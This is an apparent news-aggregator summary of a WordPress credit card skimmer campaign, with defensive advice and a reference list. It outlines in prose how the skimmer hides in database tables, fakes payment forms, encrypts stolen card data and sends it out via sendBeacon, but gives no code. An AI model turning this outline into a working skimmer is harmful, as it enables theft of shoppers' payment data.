CyberSecurity news
FlagThis
Pierluigi Paganini@securityaffairs.com - 46d
A sophisticated credit card skimmer malware campaign is targeting WordPress e-commerce websites, placing user payment information at risk. The malware operates by injecting malicious JavaScript code directly into the database tables of the content management system. This stealthy method allows the skimmer to evade traditional security detection systems, making it difficult to spot and remove. Once activated on the checkout page, the malware either hijacks existing payment fields or injects a fake payment form, closely mimicking legitimate payment processors. This form is designed to capture and record sensitive information such as credit card numbers, expiration dates, CVV numbers, and billing addresses.
The stolen data is then encoded using Base64 and encrypted with AES-CBC to make it appear harmless and harder to analyze. This encrypted data is subsequently sent to an attacker-controlled server using the navigator.sendBeacon function to avoid detection by the website user. The collected data, including payment card details and potentially other personal information, is then used for fraudulent transactions or sold on underground markets. Website owners are advised to examine custom HTML widgets, apply the latest security updates and patches, implement two-factor authentication, regularly review admin accounts, implement file integrity monitoring and use a website firewall for protection.
References :
The stolen data is then encoded using Base64 and encrypted with AES-CBC to make it appear harmless and harder to analyze. This encrypted data is subsequently sent to an attacker-controlled server using the navigator.sendBeacon function to avoid detection by the website user. The collected data, including payment card details and potentially other personal information, is then used for fraudulent transactions or sold on underground markets. Website owners are advised to examine custom HTML widgets, apply the latest security updates and patches, implement two-factor authentication, regularly review admin accounts, implement file integrity monitoring and use a website firewall for protection.
Share:
References :
- gbhackers.com: Credit Card Skimmer Hits WordPress Checkout Pages, Stealing Payment Data
- The Hacker News: WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables – Source:thehackernews.com
- www.cysecurity.news: Sophisticated Credit Card Skimmer Malware Targets WordPress Checkout Pages
- ciso2ciso.com: WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables – Source:thehackernews.com
- securityaffairs.com: Stealthy credit card skimmer targets WordPress e-commerce sites, injecting malicious JavaScript into CMS database tables to evade detection.
- ciso2ciso.com: WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables – Source:thehackernews.com
- gbhackers.com: Credit Card Skimmer Hits WordPress Checkout Pages, Stealing Payment Data
- Pyrzout :vm:: WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables – Source:thehackernews.com
- ciso2ciso.com: Credit Card Skimmer campaign targets WordPress via database injection – Source: securityaffairs.com
- Sucuri Blog: Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection
- ciso2ciso.com: Credit Card Skimmer campaign targets WordPress via database injection – Source: securityaffairs.com
Classification:
- HashTags: #WordPress #Skimmer #DataBreach
- Company: WordPress
- Target: WordPress Websites
- Product: WordPress
- Feature: Database Injection
- Type: Malware
- Severity: Major